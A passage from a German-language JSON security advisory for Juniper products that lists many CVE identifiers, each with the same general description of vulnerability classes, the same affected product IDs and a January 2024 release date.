Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2020-9493" }, { "cve": "CVE-2020-12321", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2020-12321" }, { "cve": "CVE-2020-0466", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2020-0466" }, { "cve": "CVE-2020-0465", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2020-0465" }, { "cve": "CVE-2019-17571", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2019-17571" }, { "cve": "CVE-2016-2183", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2016-2183" }, { "cve": "CVE-2024-21617", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21617" }, { "cve": "CVE-2024-21616", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21616" }, { "cve": "CVE-2024-21614", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21614" }, { "cve": "CVE-2024-21613", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21613" }, { "cve": "CVE-2024-21612", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21612" }, { "cve": "CVE-2024-21611", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21611" }, { "cve": "CVE-2024-21607", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21607" }, { "cve": "CVE-2024-21606", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21606" }, { "cve": "CVE-2024-21604", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21604" }, { "cve": "CVE-2024-21603", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21603" }, { "cve": "CVE-2024-21602", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21602" }, { "cve": "CVE-2024-21601", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21601" }, { "cve": "CVE-2024-21600", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21600" }, { "cve": "CVE-2024-21599", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21599" }, { "cve": "CVE-2024-21597", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21597" }, { "cve": "CVE-2024-21596", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21596" }, { "cve": "CVE-2024-21595", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21595" }, { "cve": "CVE-2024-21594", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen 